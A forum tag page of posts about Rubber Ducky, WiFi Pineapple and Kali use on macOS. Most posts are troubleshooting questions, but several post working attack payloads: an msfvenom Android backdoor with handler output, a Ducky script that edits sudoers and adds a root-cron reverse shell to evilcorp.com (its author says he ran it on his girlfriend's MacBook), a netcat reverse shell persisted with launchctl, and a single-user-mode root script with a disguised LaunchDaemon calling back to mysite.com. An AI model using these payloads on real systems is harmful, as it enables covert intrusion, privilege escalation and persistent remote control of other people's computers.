Showing results for tags 'osx'.

  1. I just created a sample Android backdoor called apkgue.apk. After I ran it on my phone (Android), I got stuck at the next step: the meterpreter > doesn't show. Why? Any help for me? Thanks.

         msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
         [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
         No platform was selected, choosing Msf::Module::Platform::Android from the payload
         No Arch selected, selecting Arch: dalvik from the payload
         No encoder or badchars specified, outputting raw payload
         Payload size: 8809 bytes
         msf > use exploit/multi/handler
         msf exploit(handler) > set payload android/meterpreter/reverse_tcp
         payload => android/meterpreter/reverse_tcp
         msf exploit(handler) > set lhost 192.168.43.128
         lhost => 192.168.43.128
         msf exploit(handler) > set lport 3344
         lport => 3344
         msf exploit(handler) > show options
         Module options (exploit/multi/handler):
            Name  Current Setting  Required  Description
            ----  ---------------  --------  -----------
         Payload options (android/meterpreter/reverse_tcp):
            Name   Current Setting  Required  Description
            ----   ---------------  --------  -----------
            LHOST  192.168.43.128   yes       The listen address
            LPORT  3344             yes       The listen port
         Exploit target:
            Id  Name
            --  ----
            0   Wildcard Target
         msf exploit(handler) > exploit
         [*] Exploit running as background job 0.
         [*] Started reverse TCP handler on 192.168.43.128:3344
         msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1
         [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  2. Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry, which should be fine:

         ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 >

     On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this to work on my Mac as well. Do you have any tips? Thanks, David
  3. Hi, my MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If I do the same on a Linux machine it works fine. I can easily log in to the web interface on http://172.16.42.1:1471

         Subsequent sessions may be quickly connected using saved settings.
         [C]onnect using saved settings
         [G]uided setup (recommended)
         [M]anual setup
         [A]dvanced IP settings
         [Q]uit
         Step 1 of 3: Select Default Gateway
         Default gateway reported as 192.168.0.1
         Use the above reported default gateway? [Y/n]? Y
         Step 2 of 3: Select Internet Interface
         Internet interface reported as en0
         Use the above reported Internet interface? [Y/n]? Y
         Step 3 of 3: Select WiFi Pineapple Interface
         Please connect the WiFi Pineapple to this computer.
         ...................................................
         ...................................................
  4. I found a script for the Ducky that looked pretty cool, and also a thing I wanted to try. So I changed the details for what I needed. To test if it worked right (just if the text was right) I encoded it to open TextEdit instead of Terminal. Now I got my inject.bin and plugged in my Ducky. It opens TextEdit and types it in, BUT... for some reason it changes all > to § and < to $. It also changes ' to ’. I'm guessing it's because of the keyboard language, but I'm using a Danish keyboard and also encode it with Danish?? Sorry if bad English, and thx for any help and info given!
  5. I am trying to launch Kali Linux on my Macbook Pro and when I launch it using refind I get this error: "No bootable device -- Insert boot disk and press any key." My USB is working fine on other Macbooks, even older than mine. MPR Specifications: Macbook Pro 13" Early 2011 i5, 4 RAM Model Identifier: MacBookPro8,1 Hardware UUID: 1BC47169-1046-5052-B58F-F736330B7B6
  6. Step One: unpacked my Pineapple Nano. Step Two: connected to my MacBook Air. Initial setup screen says "Please ensure that the WiFi Pineapple is powered according to documentation for a successful firmware flash." Can anyone please point me to the 'Documentation' so that I can start with an RTFM [hoping to avoid a list of dumb questions]? Also, the Download section for the Nano firmware flash only includes Android, Linux, Windows, so if I don't want to use my MacBook Air [forums seem to indicate it's more complicated, and I may not want to mess up my work laptop] does anyone have a recommendation between Android, Linux or Windows for a machine to use with my Pineapple Nano? Should I figure out how to build a Kali Linux laptop? [that would be another month-long learning curve, right???]
  7. I can't even seem to connect to my new Nano. There is no response on http://172.16.42.1:1471. I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address??? Ifconfig output is below - and screen show is attached ... I'm stuck!!! Any ideas? Is there a way to Hard Reset??

         en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
                 options=4<VLAN_MTU>
                 ether 00:c0:ca:8f:b6:11
                 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa
                 nd6 options=1<PERFORMNUD>
                 media: autoselect (100baseTX <full-duplex,flow-control>)
                 status: active
         bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
                 options=3<RXCSUM,TXCSUM>
                 ether 9a:e0:d9:79:10:64
                 inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255
                 inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb
                 Configuration:
                         id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0
                         maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200
                         root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0
                         ipfilter disabled flags 0x2
                 member: en5 flags=3<LEARNING,DISCOVER>
                         ifmaxaddr 0 port 10 priority 0 path cost 0
                 nd6 options=1<PERFORMNUD>
                 media: autoselect
                 status: active

     pineapple-setup-stuck.pdf
  8. Hi all, I'm looking at making a script on a CD-ROM that will: recognise the operating system of the machine it has been inserted into; run a specific script for that operating system. Is there a cross-platform script/code language that would be recognised by both Windows and OSX, as a standard build? I understand that Python, for example, could run on both, however this would require the user to have installed it. Is there a language that both OSX and Windows would recognise straight out of the box? I tried a few internet searches, but everything I find pretty much states you have to download additional files to the PC (e.g., installing Python), which is no good. Thank you.
  9. Hi, looking for some help, total noob here. I've searched the forum and can't find any answers or similar problems to mine (I'm sure it's a simple noob error). Basically I've tried two different payloads, a simple "hello world" and a wallpaper change. Both have the same issue, which ends up with the desktop icons being renamed to the actual code that is in the text file / payload, whilst the payload is executing. As far as I'm aware the inject file is compiled correctly, and placed at the root of the Ducky micro SD. I've also watched and followed the Ducky quack start guide, with no luck. Any help or advice would be greatly appreciated (trying different delays right now). Cheers
  10. Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. 
One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it!
  11. I've flashed the cm_duck.hex firmware on my USB Rubber Ducky and I cannot get inject.bin or inject2.bin to execute on my Macbook (it works fine on a Windows computer). I've ensured that the caps lock light is on, and also tried pressing the button on the USB. The default duck.hex and c_duck_v2_S001.hex works (S001 requires pressing of button on USB) on my Macbook. Is OS X not supported by the cm_duck.hex firmware? Or am I doing anything wrong? Any help will be greatly appreciated
  12. Hi all, I bought a Rubber Ducky recently to bypass the EFI password like Teensy 3 https://www.youtube.com/watch?v=xXMiX-Bybsw But when typing the password, it just types 1 or 2 dots in the password case and after typing enter, sometimes does nothing... Anyone know the issue for that? Thanks in advance. Sorry for my bad English because I'm from Belgium...
  13. Hello, I just ordered and received my first Rubber Ducky in the mail. Let me just say that I think it's an incredible piece of equipment. I do however have one problem. I wrote my first payload in TextEdit, correctly encoded it (via Terminal) onto the MicroSD, and then loaded it into the Rubber Ducky. When I insert the Rubber Ducky into my USB slot, the commands are being carried out, but the GUI command is not cooperating with my Mac OSX. Here is my code: GUI SPACE is intended to execute COMMAND SPACE on my Mac OSX. The rest of the code just does random stuff with Finder because the first command didn't work. To fix this problem I think I need to update the firmware? To update the firmware I believe I need to flash the Ducky... But I haven't been able to do this using dfu-programmer-0.5.4. I have followed this tutorial: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky According to the README file on dfu-programmer-0.5.4 I am supposed to "./configure", "make", and "make install" before I can flash the Ducky (from my understanding). I am able to configure the file, but when I type "make" / "make install" I get the error message "Fatal Error: usb.h not found". I have tried everything to get around this. If someone could please help me update the firmware on my Rubber Ducky, or tell me what I am doing wrong, I would greatly appreciate it.
  14. Can I use the Ducky to install a file on a Mac and run it when the flash drive is plugged in?
  15. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  16. Hi, I have a bit of a newbie question so thanks in advance for any replies. I have just ordered my first Pineapple. Will the Mark V automatically connect to a Mac OSX via ethernet? I'm not talking about sharing an internet connection at this point, but just accessing the Pineapple's web interface? I cannot find any information online. Even the Wiki page related to this is empty: http://wiki.wifipineapple.com/index.php/OSX_ICS Thanks.
  17. Hi guys! I've just received my Rubber Ducky. I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a Mac. I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (I'm working on an azerty MacBook Pro). Everything seems to be okay (no azerty/qwerty problem), except one thing: the ~ character does not print. Does somebody have an idea?
  18. Okay, so I am going to get the MSI GT60 0NF-612US laptop and I wanted to know if I could run OSX in VirtualBox on it...... I am only asking because when I tried it on my Dell Inspiron 1545 it said that I had the wrong processor or something, so idk if it would work in the laptop I'm going to get or not.... Does anyone actually know why it didn't work? And will it work with this processor? Windows 7 Professional / Intel Core i7-3630QM Processor. I really just want to have the best of both worlds: Mac when I need it and Windows when I don't!!!! Any help would be appreciated! -Thanks
  19. Hello again. I made another payload for Mac OSX. This one will print any file from the internet (you can delete the "curl -o" command to print a local file). If you don't want it to delete the printed file, just remove the "-r". But otherwise you only have to replace the brackets () and what's inside of them with your configuration. Please reply, doesn't matter what you say. I just want to see if I am wasting my time about something that no one cares about. DELAY 2000 GUI SPACE DELAY 500 STRING Terminal DELAY 1000 ENTER DELAY 1000 curl -O (here put a link to a photo of file to download or delete the command to print a local file ex. trollface.com/troll.jpg) ENTER DELAY 2000 (change this delay to adjust your internet download speed/the file size) STRING lpr -P (here put the name of the printer ex. Hp-officejet) -# (here put the number of copies) -r (here navigate to the photo or file. Its in your home folder or home directory. ex. /home/jake/photo) ENTER DELAY 3000 Command-Q
  20. Linux: Depending on your architecture it should be available within your package manager; maybe we should pad this out in following posts below? As of Kali 1.0.5 it should be installed by default. http://www.kali.org/news/kali-linux-software-defined-radio-support/
      OSX: Either download the software from this website GQRX or, if you have MacPorts: port install gqrx
      MacPorts is preferred as it will install all necessary dependencies, like gnuradio and gr-osmosdr (drivers for RTLSDR). It should then appear within Applications! Very point-and-click orientated - very easy to use. EDIT: You can also use brew instead of MacPorts, but I'm more familiar with MacPorts!
  21. Hi! I know that you can already find a small number of payloads on GitHub, but there are many more that have been created by the community. For example, we found none for Android on GitHub. And I have experienced the difficulty of finding exactly what I need ;) That's why I think it would be a good initiative to gather as many payloads as possible in this topic. If you have created an effective and fun one, or if you regularly use one made by another member, why not post it below to share it? (Select those which are not already on GitHub for the moment, please.) If you are interested, try to complete a short form of this type and post it below. Title: Author: Target: Description: Obviously, if it does not seem to be a good idea, let me know -_-
  22. Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol) REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER
  23. Hi all, Just got my first USB Rubber Ducky and decided to write a payload to prank some friends. REM Title: OSX background changer REM This payload will open terminal, download an image to the default desktop REM pictures directory, set it as the background then kill the dock to REM refresh the background. It also closes the terminal window. DELAY 3000 GUI SPACE STRING terminal DELAY 200 ENTER DELAY 200 STRING cd /Library/Desktop\ Pictures DELAY 200 ENTER STRING curl -s -O http://YOUR_URL_HERE/1.jpg ENTER DELAY 2000 STRING defaults write com.apple.desktop Background '{default = {ImageFilePath = "/Library/Desktop Pictures/1.jpg";};}' ENTER DELAY 200 STRING killall Dock ENTER STRING killall Terminal ENTER Be sure to put in a valid URL of the image you want to set as the background. This works best if you're using the latest firmware with the vidpid.bin file set to 05ac 0202. It's my first payload, so if you see anything the matter, please let me know. L
  24. Has there been any progress getting internet sharing to work with OSX and Pineapple using Fusion? I hate having to use a separate laptop just for the Pineapple. I've created the second adapter for the vm, set it to ethernet, etc...Fusion then assigns its own IP vice using the 172...... Any ideas?
  25. How can I trigger the OPTION key on OSX? I am trying to use keyboard shortcuts to open finder, search for terminal, and then open it. I want to minimize all windows using COMMAND-OPTION-M and then launch finder with COMMAND-F